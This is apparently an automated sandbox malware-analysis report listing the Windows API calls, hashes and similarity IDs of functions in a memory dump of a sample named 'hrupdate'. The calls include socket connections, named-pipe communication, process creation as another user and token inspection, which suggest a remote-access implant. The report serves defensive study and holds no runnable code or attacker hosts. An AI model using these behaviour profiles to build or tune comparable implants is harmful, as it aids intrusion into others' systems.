                                                                • Opcode Fuzzy Hash: 6e962035ec25cf2fbf3ac19bd4c125f38f0688742753830840ed1eef832f9458
                                                                • Instruction Fuzzy Hash: 14314534B02308EFEB54DF58C845BAEBBF5EB44705F148488F90A9B280D775E989CB90
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FCAB53
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • htonl.WS2_32(0B05BF21), ref: 04FCAB5D
                                                                • htonl.WS2_32(?), ref: 04FCAB67
                                                                • htonl.WS2_32(?), ref: 04FCAB72
                                                                • WaitForSingleObject.KERNEL32(?,00000000,?,?,0B05BF21,00000001,00000000,00000000,04FC38C6), ref: 04FCABD1
                                                                • _memset.LIBCMT ref: 04FCAC02
                                                                  • Part of subcall function 04FCACE9: PeekNamedPipe.KERNEL32(00000000,00000000,00000004,04FC38C6,00000000,00000000,00000001,0B05BF21,00000000,0B05BF21,00000001,00000000,00000000,04FC38C6), ref: 04FCAD21
                                                                  • Part of subcall function 04FCACE9: htonl.WS2_32(?), ref: 04FCAD3F
                                                                  • Part of subcall function 04FCACE9: PeekNamedPipe.KERNEL32(00000008,?,00000004,00000004,00000008,00000000), ref: 04FCAD8E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: htonl$NamedPeekPipe$AllocateHeapObjectSingleWait_malloc_memset
                                                                • String ID:
                                                                • API String ID: 3572882391-0
                                                                • Opcode ID: 9165f39b7b214133181e4013514fd110f7224f61ea7dd2e3d477a942742c38b8
                                                                • Instruction ID: 8d13e9c19d7f83521859891e8e510b21439185e0653e3c7ed2613938606ebe46
                                                                • Opcode Fuzzy Hash: 9165f39b7b214133181e4013514fd110f7224f61ea7dd2e3d477a942742c38b8
                                                                • Instruction Fuzzy Hash: 7821D436D0071A9FE7316F749F40B7673AAEF40328714492EE9858A051F731F8878761
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC99D6
                                                                • _memset.LIBCMT ref: 04FC99E2
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9B9E
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9BA9
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BB5
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BC0
                                                                  • Part of subcall function 04FC9B4C: _rand.LIBCMT ref: 04FC9C1E
                                                                • __snprintf.LIBCMT ref: 04FC9A33
                                                                • __snprintf.LIBCMT ref: 04FC9A4B
                                                                • _memset.LIBCMT ref: 04FC9A6A
                                                                • _memset.LIBCMT ref: 04FC9A75
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$__snprintf_malloc$_rand
                                                                • String ID:
                                                                • API String ID: 1876596931-0
                                                                • Opcode ID: 3ab76693c85f7c8b0df6cf2efac4df2f23407f6b9f118f724d732a0b4dddca48
                                                                • Instruction ID: ac2b16a3b0e90cafd1600e9bc179e3babfc478eae3439853c8dffd9642f424d3
                                                                • Opcode Fuzzy Hash: 3ab76693c85f7c8b0df6cf2efac4df2f23407f6b9f118f724d732a0b4dddca48
                                                                • Instruction Fuzzy Hash: 5C216FB2900104FBEF14AF15CD81F5B7B69EF91708F544098EE006B296D6B1FE22CAA5
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FD30DE
                                                                • _memset.LIBCMT ref: 04FD30EC
                                                                • _memset.LIBCMT ref: 04FD30FA
                                                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 04FD3117
                                                                • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 04FD3146
                                                                • __snprintf.LIBCMT ref: 04FD3168
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$AccountInformationLookupToken__snprintf
                                                                • String ID:
                                                                • API String ID: 2009363630-0
                                                                • Opcode ID: 5bb153b6c4cdc11f372429f20f512a98ffc8b83a1de7cb42c0d9b4e93b7cdc18
                                                                • Instruction ID: 1182d0b6c440dfdf9565ecf573c1521b0eaf37a148c2352d4b47a6d89de8482c
                                                                • Opcode Fuzzy Hash: 5bb153b6c4cdc11f372429f20f512a98ffc8b83a1de7cb42c0d9b4e93b7cdc18
                                                                • Instruction Fuzzy Hash: 5621D3B2D0021DBEEB11DAD1DC84EEF77BCEF04748F0444BABA15E2111E674AB858B64
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_strncpy
                                                                • String ID:
                                                                • API String ID: 3537405232-0
                                                                • Opcode ID: 6e042d746d1d594135fbca47d0afb172622c9a4fa346a5672d678b3b06c6056f
                                                                • Instruction ID: 358e126f7e271cf1dd1b4a3b61438a545be2ad186dc29e01c2d9a3e73f6432d4
                                                                • Opcode Fuzzy Hash: 6e042d746d1d594135fbca47d0afb172622c9a4fa346a5672d678b3b06c6056f
                                                                • Instruction Fuzzy Hash: 1C81C372D0020BABEB10DBA4DE55FEE7BBCAF45318F14456AE514E7181E731F6068BA0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_strncpy
                                                                • String ID:
                                                                • API String ID: 3537405232-0
                                                                • Opcode ID: 8ac07fba0ed1d9553a2976d14e0964b8804b2fe4e3c87d8c7583f7bdfd4b0fd8
                                                                • Instruction ID: 81ee9bbbb82d93d48a80697974c83570eb188043eee0c89c6f3a0e6927ff264c
                                                                • Opcode Fuzzy Hash: 8ac07fba0ed1d9553a2976d14e0964b8804b2fe4e3c87d8c7583f7bdfd4b0fd8
                                                                • Instruction Fuzzy Hash: C251B971D4024BAAEB10DBE0DD51FEE777CAB04348F04C47AE915AB081EA35B65B8B51
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC6A00
                                                                  • Part of subcall function 04FD3DDD: htonl.WS2_32(?), ref: 04FD3E37
                                                                  • Part of subcall function 04FD3DDD: htonl.WS2_32(?), ref: 04FD3E41
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC6A28
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC6A72
                                                                • GetLocalTime.KERNEL32(?), ref: 04FC6ABA
                                                                • GetCurrentDirectoryA.KERNEL32(00000800,00000000), ref: 04FC6AE2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: LocalTime$htonl$CurrentDirectory_memset
                                                                • String ID:
                                                                • API String ID: 1947157357-0
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC9AA0
                                                                • _memset.LIBCMT ref: 04FC9AAC
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9B9E
                                                                  • Part of subcall function 04FC9B4C: _malloc.LIBCMT ref: 04FC9BA9
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BB5
                                                                  • Part of subcall function 04FC9B4C: _memset.LIBCMT ref: 04FC9BC0
                                                                  • Part of subcall function 04FC9B4C: _rand.LIBCMT ref: 04FC9C1E
                                                                • __snprintf.LIBCMT ref: 04FC9B08
                                                                • _memset.LIBCMT ref: 04FC9B26
                                                                • _memset.LIBCMT ref: 04FC9B31
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_malloc$__snprintf_rand
                                                                • String ID:
                                                                • API String ID: 4266533377-0
                                                                APIs
                                                                • CreateProcessAsUserA.ADVAPI32(B52F6D90,00000000,04FCD106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,04FC819B,?), ref: 04FC80C9
                                                                • GetLastError.KERNEL32(?,?,04FCD106,?), ref: 04FC80D9
                                                                • GetLastError.KERNEL32(?,?,04FCD106,?), ref: 04FC80F3
                                                                  • Part of subcall function 04FC7E95: _memset.LIBCMT ref: 04FC7EC3
                                                                  • Part of subcall function 04FC7E95: _memset.LIBCMT ref: 04FC7EDF
                                                                • CreateProcessA.KERNEL32(00000000,04FCD106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,04FC819B,?,?), ref: 04FC8118
                                                                • GetLastError.KERNEL32(?,?,04FCD106,?), ref: 04FC8122
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateProcess_memset$User
                                                                • String ID:
                                                                • API String ID: 3779600536-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTickshutdown$closesocket
                                                                • String ID:
                                                                • API String ID: 3414035747-0
                                                                APIs
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 030D086E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943261840.00000000030D0000.00000020.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_30d0000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                APIs
                                                                  • Part of subcall function 04FD2BBA: _memset.LIBCMT ref: 04FD2C43
                                                                • GetLastError.KERNEL32(74DF23A0,?,?,?,04FCAE7B,?,-0000EA60,?,?,04FC6D15,?,?), ref: 04FCADC3
                                                                • WaitNamedPipeA.KERNEL32(?,00002710), ref: 04FCADD8
                                                                • SetNamedPipeHandleState.KERNEL32(04FC6D15,?,00000000,00000000,?,?,?,04FCAE7B,?,-0000EA60,?,?,04FC6D15,?,?), ref: 04FCAE01
                                                                • DisconnectNamedPipe.KERNEL32(04FC6D15,?,?,?,04FCAE7B,?,-0000EA60,?,?,04FC6D15,?,?), ref: 04FCAE0D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$DisconnectErrorHandleLastStateWait_memset
                                                                • String ID:
                                                                • API String ID: 1374046827-0
                                                                APIs
                                                                • __getptd.LIBCMT ref: 04FE5CEA
                                                                  • Part of subcall function 04FDF61D: __getptd_noexit.LIBCMT ref: 04FDF620
                                                                  • Part of subcall function 04FDF61D: __amsg_exit.LIBCMT ref: 04FDF62D
                                                                • __amsg_exit.LIBCMT ref: 04FE5D0A
                                                                • __lock.LIBCMT ref: 04FE5D1A
                                                                • InterlockedDecrement.KERNEL32(?), ref: 04FE5D37
                                                                • InterlockedIncrement.KERNEL32(4029A377), ref: 04FE5D62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                • String ID:
                                                                • API String ID: 4271482742-0
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FD3E67
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _malloc.LIBCMT ref: 04FD3E74
                                                                • _malloc.LIBCMT ref: 04FD3E8F
                                                                • __snprintf.LIBCMT ref: 04FD3EA2
                                                                • _malloc.LIBCMT ref: 04FD3EC1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$AllocateHeap__snprintf
                                                                • String ID:
                                                                • API String ID: 3929630252-0
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FC6B84
                                                                • gethostbyname.WS2_32(?), ref: 04FC6B98
                                                                • htons.WS2_32(?), ref: 04FC6BC1
                                                                • connect.WS2_32(00000000,?,00000010), ref: 04FC6BD1
                                                                • closesocket.WS2_32(00000000), ref: 04FC6BDB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: closesocketconnectgethostbynamehtonssocket
                                                                • String ID:
                                                                • API String ID: 530611402-0
                                                                APIs
                                                                • __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FE0075: __mtinitlocknum.LIBCMT ref: 04FE008B
                                                                  • Part of subcall function 04FE0075: __amsg_exit.LIBCMT ref: 04FE0097
                                                                  • Part of subcall function 04FE0075: RtlEnterCriticalSection.NTDLL(?), ref: 04FE009F
                                                                • ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                • ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                • HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                • GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 2714421763-0
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCB70B
                                                                • GetTickCount.KERNEL32 ref: 04FCB712
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 04FCB725
                                                                • Sleep.KERNEL32(0000000A), ref: 04FCB736
                                                                • GetTickCount.KERNEL32 ref: 04FCB73C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$NamedPeekPipeSleep
                                                                • String ID:
                                                                • API String ID: 1593283408-0
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                  • Part of subcall function 04FDE48E: __fsopen.LIBCMT ref: 04FDE49B
                                                                • _fseek.LIBCMT ref: 04FC8369
                                                                  • Part of subcall function 04FDEAC8: __lock_file.LIBCMT ref: 04FDEAD7
                                                                  • Part of subcall function 04FDEAC8: __ftelli64_nolock.LIBCMT ref: 04FDEAE4
                                                                • _fseek.LIBCMT ref: 04FC8382
                                                                  • Part of subcall function 04FDEE59: __lock_file.LIBCMT ref: 04FDEEA4
                                                                  • Part of subcall function 04FDEE59: __fseek_nolock.LIBCMT ref: 04FDEEB4
                                                                • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 04FC83AF
                                                                • _malloc.LIBCMT ref: 04FC83C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                                                                • String ID:
                                                                • API String ID: 73014519-0
                                                                APIs
                                                                • __flush.LIBCMT ref: 04FDE569
                                                                • __fileno.LIBCMT ref: 04FDE589
                                                                • __locking.LIBCMT ref: 04FDE590
                                                                • __flsbuf.LIBCMT ref: 04FDE5BB
                                                                  • Part of subcall function 04FDFE0C: __getptd_noexit.LIBCMT ref: 04FDFE0C
                                                                  • Part of subcall function 04FE1DF7: __decode_pointer.LIBCMT ref: 04FE1E02
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                • String ID:
                                                                • API String ID: 3240763771-0
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,000002F0,?,00000000,04FC532B,?,00000001,?,00000008,00000001), ref: 04FC5015
                                                                • _memset.LIBCMT ref: 04FC504A
                                                                • HeapFree.KERNEL32(433DB52F,00000000,960B05BF,000002F0,?,00000000,04FC532B,?,00000001,?,00000008,00000001), ref: 04FC50F7
                                                                • HeapDestroy.KERNEL32(?,00000008,00000001), ref: 04FC5103
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Heap$DestroyErrorFreeLast_memset
                                                                • String ID:
                                                                • API String ID: 4224181572-0
                                                                APIs
                                                                Similarity
                                                                • API ID: _memsethtonl
                                                                APIs
                                                                • htonl.WS2_32(?), ref: 04FC6FA0
                                                                • htonl.WS2_32(?), ref: 04FC6FAA
                                                                • _malloc.LIBCMT ref: 04FC6FC1
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _memset.LIBCMT ref: 04FC7025
                                                                  • Part of subcall function 04FCFF96: __snprintf.LIBCMT ref: 04FD0014
                                                                  • Part of subcall function 04FCFF96: __snprintf.LIBCMT ref: 04FD0026
                                                                Similarity
                                                                • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                                                                APIs
                                                                Similarity
                                                                • API ID: _memset$_malloc
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FCAEF6
                                                                • _memset.LIBCMT ref: 04FCAF08
                                                                  • Part of subcall function 04FCC036: htons.WS2_32(?), ref: 04FCC04E
                                                                  • Part of subcall function 04FCAE32: GetLastError.KERNEL32(-0000EA60,?,?,04FC6D15,?,?), ref: 04FCAE4D
                                                                • Sleep.KERNEL32(000001F4), ref: 04FCAFA8
                                                                • GetLastError.KERNEL32 ref: 04FCAFB4
                                                                Similarity
                                                                • API ID: ErrorLast_memset$Sleephtons
                                                                APIs
                                                                • __time64.LIBCMT ref: 04FD0E25
                                                                  • Part of subcall function 04FDDC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04FD0BCD,00000000,00000080,00000000,00000000,?,?,?,04FC35CD,?,00000000,00000000), ref: 04FDDC30
                                                                  • Part of subcall function 04FDDC25: __aulldiv.LIBCMT ref: 04FDDC50
                                                                • __time64.LIBCMT ref: 04FD0E40
                                                                • __time64.LIBCMT ref: 04FD0ED3
                                                                • __time64.LIBCMT ref: 04FD0F29
                                                                Similarity
                                                                • API ID: __time64$Time$FileSystem__aulldiv
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FCA734
                                                                • GetVersionExA.KERNEL32(?,?,?,04FC9F20), ref: 04FCA74D
                                                                • SetLastError.KERNEL32(00000005,?,?,04FC9F20), ref: 04FCA772
                                                                • SetLastError.KERNEL32(00000006,?,?,?,?,00000000,?,?,?,?,?,?,?,04FC9F20), ref: 04FCA802
                                                                Similarity
                                                                • API ID: ErrorLast$Version_memset
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 04FE8ACC
                                                                • __isleadbyte_l.LIBCMT ref: 04FE8B00
                                                                • MultiByteToWideChar.KERNEL32(00D0E035,00000009,04FF655C,FFFFFB4C,04FF655C,00000000,?,?,?,04FC5E94,04FF655C,04FF655C,00000000), ref: 04FE8B31
                                                                • MultiByteToWideChar.KERNEL32(00D0E035,00000009,04FF655C,00000001,04FF655C,00000000,?,?,?,04FC5E94,04FF655C,04FF655C,00000000), ref: 04FE8B9F
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                APIs
                                                                • Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FAE
                                                                • RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,04FC39A6), ref: 04FD2FE7
                                                                • WaitForSingleObject.KERNEL32(00000000,?,?,04FC39A6), ref: 04FD3003
                                                                • ExitProcess.KERNEL32 ref: 04FD300F
                                                                Similarity
                                                                • API ID: Exit$ObjectProcessSingleSleepThreadUserWait
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC676C
                                                                • CreatePipe.KERNEL32(?,?,?,00100000), ref: 04FC67A2
                                                                • GetStartupInfoA.KERNEL32(?), ref: 04FC67AC
                                                                • WaitForSingleObject.KERNEL32(?,00002710), ref: 04FC67F5
                                                                Similarity
                                                                • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FC3314
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                  • Part of subcall function 04FC8A21: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000,00002000,?,04FC32B4,00000000,?,00002000,?,00002000,?,?,?,00000000), ref: 04FC8A33
                                                                • _memset.LIBCMT ref: 04FC3369
                                                                • _memset.LIBCMT ref: 04FC3378
                                                                • _memset.LIBCMT ref: 04FC338F
                                                                Similarity
                                                                • API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
                                                                APIs
                                                                Similarity
                                                                • API ID: _memset
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FC4BA3
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • htonl.WS2_32(?), ref: 04FC4BB2
                                                                • htonl.WS2_32(?), ref: 04FC4BBC
                                                                • _memset.LIBCMT ref: 04FC4BDE
                                                                  • Part of subcall function 04FDD93E: __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FDD93E: ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                  • Part of subcall function 04FDD93E: ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                  • Part of subcall function 04FDD93E: HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                  • Part of subcall function 04FDD93E: GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                Similarity
                                                                • API ID: Heaphtonl$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                APIs
                                                                Similarity
                                                                • API ID: _clock
                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 04FD3203
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 04FD320A
                                                                • GetCurrentProcess.KERNEL32(00000008,?), ref: 04FD322D
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 04FD3234
                                                                  • Part of subcall function 04FD317B: __snprintf.LIBCMT ref: 04FD31C8
                                                                Similarity
                                                                • API ID: CurrentOpenProcessThreadToken$__snprintf
                                                                APIs
                                                                • accept.WS2_32(?,00000000,00000000), ref: 04FD3F4E
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 04FD3F7B
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 04FD3F89
                                                                • closesocket.WS2_32(00000000), ref: 04FD3F94
                                                                  • Part of subcall function 04FD3ED0: closesocket.WS2_32(?), ref: 04FD3ED2
                                                                Similarity
                                                                • API ID: closesocketsend$accept
                                                                APIs
                                                                • InitializeProcThreadAttributeList.KERNELBASE(00000000,04FCD06D,00000000,00000000), ref: 04FCCFE5
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,04FCD06D,00000000), ref: 04FCCFEB
                                                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04FCCFF2
                                                                • InitializeProcThreadAttributeList.KERNELBASE(00000000,04FCD06D,00000000,00000000), ref: 04FCD007
                                                                Similarity
                                                                • API ID: AttributeHeapInitializeListProcThread$AllocateProcess
                                                                • String ID:
                                                                • API String ID: 3402284281-0
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCAE9D
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 04FCAEB1
                                                                • Sleep.KERNEL32(000001F4), ref: 04FCAEC5
                                                                • GetTickCount.KERNEL32 ref: 04FCAECB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$NamedPeekPipeSleep
                                                                • String ID:
                                                                • API String ID: 1593283408-0
                                                                APIs
                                                                • __getptd.LIBCMT ref: 04FE6456
                                                                  • Part of subcall function 04FDF61D: __getptd_noexit.LIBCMT ref: 04FDF620
                                                                  • Part of subcall function 04FDF61D: __amsg_exit.LIBCMT ref: 04FDF62D
                                                                • __getptd.LIBCMT ref: 04FE646D
                                                                • __amsg_exit.LIBCMT ref: 04FE647B
                                                                • __lock.LIBCMT ref: 04FE648B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
